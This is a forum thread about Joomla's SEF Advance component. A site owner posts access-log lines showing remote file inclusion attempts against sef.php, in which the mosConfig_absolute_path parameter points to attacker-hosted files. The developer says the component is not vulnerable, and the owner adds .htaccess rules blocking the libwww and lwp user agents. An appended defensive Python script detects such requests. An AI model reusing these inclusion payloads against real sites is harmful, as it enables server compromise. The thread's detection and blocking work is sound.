My site blocked by my provider (libwww-perl): sef.php hacked?

16 years 9 months ago #1749 by wadzaloo
Hi All,

Sorry first for my poor English...

I am the owner of a site using Joomla 1.0.12 and the last version of SEF Advance. All files are the original ones in the SEF Advance package (htaccess, sef.php...)

I don't feel skilled enough to find the way to avoid this attack on my site. I just know that this script libwww-perl does not smell good.
Here is a chosen extract of my logfile:
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:51 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:54 +0100] "GET /bric-a-brac/section// HTTP/1.1" 404 40352 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:16 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/xt.gif? HTTP/1.1" 200 174 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:17 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 342 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:59 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"

Could you please help me to find the root cause of this (if sef is really the reason) and a workaround?

Thank you in advance  ;)


16 years 9 months ago #1751 by Saka
It is not possible to hack SEF Advance with URL exploits like this.
However, just to keep things pretty, I just added a security layer which will stop the attacker even before he can get to an execution attempt, so it exits gracefully. You can download and install the latest version (5.4.6) and be sure to replace your .htaccess. This way these attacks result in a forbidden error.

Emir Sakic
www.sakic.net


16 years 9 months ago #1754 by wadzaloo
Many Thanks !

I understand, sef is not the cause.
While waiting for your answer, I have added the following lines to htaccess. Compared to your security layer, is it equivalent?
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

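An added example, not part of the thread and not SEF Advance code: a Python log triage script that finds requests like those in the extract by what they carry (a query parameter whose decoded value is a remote URL) rather than by User-Agent, and separates the ones the server answered with 2xx from the rest. The sample lines, host names and function names are constructed for illustration; the third sample line uses a browser-like User-Agent to show that matching on the parameter still catches it.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample in the same layout as the extract above; hosts and URLs
# are placeholders, not values from the thread.
SAMPLE_LOG = '''\
client.example.net www.example.org - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://remote.example/a.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
client.example.net www.example.org - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://remote.example/a.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
client.example.net www.example.org - [10/Dec/2007:13:13:02 +0100] "GET /index.php?mosConfig_absolute_path=hTTp%3A%2F%2Fremote.example/a.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
reader.example.net www.example.org - [10/Dec/2007:13:14:10 +0100] "GET /index.php?option=com_content&Itemid=18 HTTP/1.1" 200 40352 "-" "Mozilla/5.0"
'''

# client, vhost, ident, [time], "METHOD target PROTO", status, size, "referer", "agent"
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$')
# A parameter value that is itself an absolute URL (checked after URL-decoding).
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def remote_include_attempts(log_text):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line is not in the expected layout
        _path, _, query = m['target'].partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({'time': m['time'], 'client': m['client'],
                             'param': name, 'value': value,
                             'status': int(m['status']), 'agent': m['agent']})
    return hits


def triage(hits):
    """Count attempts per (client, outcome).

    'served' (2xx) only means the server answered the request; it does not
    show that anything was included. Everything else is 'not_served'.
    """
    def outcome(status):
        return 'served' if 200 <= status < 300 else 'not_served'
    return Counter((h['client'], outcome(h['status'])) for h in hits)
```

Requests counted as served are the ones to review by hand against the application and PHP configuration; the status code alone does not say what the script did with the parameter.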
